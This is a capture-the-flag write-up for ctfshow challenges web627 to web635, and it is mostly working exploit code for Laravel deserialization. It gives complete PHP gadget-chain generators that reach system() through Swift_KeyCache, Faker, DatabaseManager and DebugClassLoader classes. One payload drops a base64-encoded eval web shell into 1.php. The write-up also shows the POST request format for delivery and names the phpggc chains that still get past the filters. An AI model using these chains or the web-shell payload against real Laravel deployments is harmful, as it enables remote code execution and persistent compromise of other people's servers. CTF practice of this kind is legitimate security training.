web627

Laravel 5.1 deserialization chain.
See the next article for the detailed analysis.

Chain: Swift_KeyCache_DiskKeyCache -> DefinedTargetClass -> ValidGenerator
exp

<?php
namespace{
    use Mockery\Generator\DefinedTargetClass;
    // Entry point: Swift_KeyCache_DiskKeyCache::__destruct iterates $_keys and
    // string-concatenates $_path, which triggers the next gadget's __toString.
    class Swift_KeyCache_DiskKeyCache{
        private $_keys=['fallingskies'=>array('fallingskies'=>'fallingskies')];
        private $_path;
        public function __construct($cmd){
            $this->_path=new DefinedTargetClass($cmd);
        }
    }
    echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache("whoami")));
}
namespace Mockery\Generator{
    use Faker\ValidGenerator;
    // DefinedTargetClass::__toString calls a method on $rfc, which lands in
    // ValidGenerator::__call.
    class DefinedTargetClass
    {
        private $rfc;
        public function __construct($cmd)
        {
            $this->rfc=new ValidGenerator($cmd);
        }
    }
}
namespace Faker{
    // DefaultGenerator::__call returns $default for any method name, so the
    // command string is handed back as the value to validate.
    class DefaultGenerator{
        protected $default;
        public function __construct($cmd)
        {
            $this->default = $cmd;
        }
    }
    // ValidGenerator::__call runs call_user_func($this->validator, $res),
    // i.e. system($cmd).
    class ValidGenerator
    {
        protected $generator;
        protected $validator;
        protected $maxRetries;
        public function __construct($cmd){
            $this->generator=new DefaultGenerator($cmd);
            $this->maxRetries=9;
            $this->validator='system';
        }
    }
}
?>

When sending the payload, a _token parameter must also be supplied,
and the Content-type header has to be added:

POST /admin HTTP/1.1
Content-type: application/x-www-form-urlencoded


ctfshow=&_token=LiNQc6R2aiDl95vWsN0ko4SoI96UJ7YRDygskvCL

web628

Honestly, why isn't this filter written out anywhere? Took forever to find that it is actually inside a function. Speechless 😒

<?php
// Snippet from the challenge source: the constructor has been replaced with a
// die(), so this gadget is dead. (Remainder of the challenge source omitted.)
class DefinedTargetClass
{
    private $rfc;

    public function __construct(\ReflectionClass $rfc)
    {
        die("此链不通");
    }
}

DefinedTargetClass is blocked, and so is ValidGenerator.
A new __toString / __call pair is needed; see the next article for the detailed analysis.

Chain: Swift_KeyCache_DiskKeyCache -> Deprecated -> DatabaseManager

<?php
namespace Illuminate\Database{
    // DatabaseManager::__call -> connection() looks up $extensions[$name] and
    // calls it as call_user_func($extension, $config, $name); with $config set
    // to 'system' and $name set to the command, that becomes system($payload).
    class DatabaseManager{
        protected $app;
        protected $extensions ;
        public function __construct($payload)
        {
            $this->app['config']['database.default'] = $payload;
            $this->app['config']['database.connections'] = [$payload => 'system'];
            $this->extensions[$payload]='call_user_func';
        }
    }
}

namespace phpDocumentor\Reflection\DocBlock\Tags{
    use Illuminate\Database\DatabaseManager;
    // Deprecated::__toString calls a method on $description, reaching
    // DatabaseManager::__call.
    class Deprecated
    {
        protected $description;
        public function __construct($payload)
        {
            $this->description=new DatabaseManager($payload);
        }
    }
}

namespace {
    use phpDocumentor\Reflection\DocBlock\Tags\Deprecated;
    // Same entry gadget as web627: __destruct string-converts $_path.
    class Swift_KeyCache_DiskKeyCache {
        private $_path;
        private $_keys = ['fallingskies' => ['fallingskies' => 'fallingskies']];
        public function __construct($payload) {
            $this->_path = new Deprecated($payload);
        }
    }
    echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache("echo 'PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg=='|base64 -d > 1.php")));
}
?>

web629

Bypass by switching to yet another chain.
See the next article for the detailed analysis.
Chain: Swift_KeyCache_DiskKeyCache -> ObjectStateToken -> Validator -> DebugClassLoader

<?php
namespace{
    use Prophecy\Argument\Token\ObjectStateToken;
    // Same entry gadget as before: __destruct string-converts $_path.
    class Swift_KeyCache_DiskKeyCache{
        private $_keys=['fallingskies'=>['fallingskies'=>'fallingskies']];
        private $_path;
        public function __construct($cmd){
            $this->_path=new ObjectStateToken($cmd);
        }
    }
    echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache("cat /flags_c")));
}
namespace Prophecy\Argument\Token{
    use Illuminate\Validation\Validator;
    // ObjectStateToken::__toString calls $this->util->stringify($this->value),
    // which lands in Validator::__call with the command as its argument.
    class ObjectStateToken{
        private $name;
        private $value;
        private $util;
        public function __construct($cmd){
            $this->name='';
            $this->value=$cmd;
            $this->util=new Validator();
        }
    }
}

namespace Illuminate\Validation{
    use Faker\DefaultGenerator;
    // Validator::__call resolves the 'class@method' extension through
    // $container->make(), i.e. DefaultGenerator::__call, and then calls
    // loadClass on whatever that returns.
    class Validator{
        protected $container;
        protected $extensions = [];
        public function __construct(){
            $this->extensions['y']='xxx@loadClass';
            $this->container=new DefaultGenerator();
        }
    }
}
namespace Faker{
    use Symfony\Component\Debug\DebugClassLoader;
    // DefaultGenerator::__call returns $default for any method name, so
    // make() hands back the DebugClassLoader.
    class DefaultGenerator
    {
        protected $default;

        public function __construct()
        {
            $this->default = new DebugClassLoader();
        }
    }
}

namespace Symfony\Component\Debug{
    // DebugClassLoader::loadClass calls call_user_func($this->classLoader, $class)
    // with the command string as $class, i.e. system($cmd).
    class DebugClassLoader
    {

        private $classLoader;
        public function __construct()
        {
            $this->classLoader = "system";
        }
    }
}
?>

web630

The previous challenge's exp still works here.

web631

Laravel 7.30 deserialization.
The RCE8 chain from phpggc works as-is.

web632

Same as above.

web633

Filtered, so switch chains.
All of the following were tried and are filtered:

RCE2

PendingBroadcast
	Dispatcher


RCE8

FileCookieJar
	RequiredIf
		LazyOption

RCE3

PendingBroadcast
	ChannelManager

RCE4

PendingBroadcast
	Validator

This one is not filtered, but the command execution produces no output.

RCE10

RequiredIf
	RequestGuard

PendingBroadcast and FileCookieJar are probably what is being filtered.

The RCE16 chain from phpggc works:

RCE16

RotatingFileHandler
	RequiredIf
		RequestGuard

web634

Same as above.

web635

Same as above.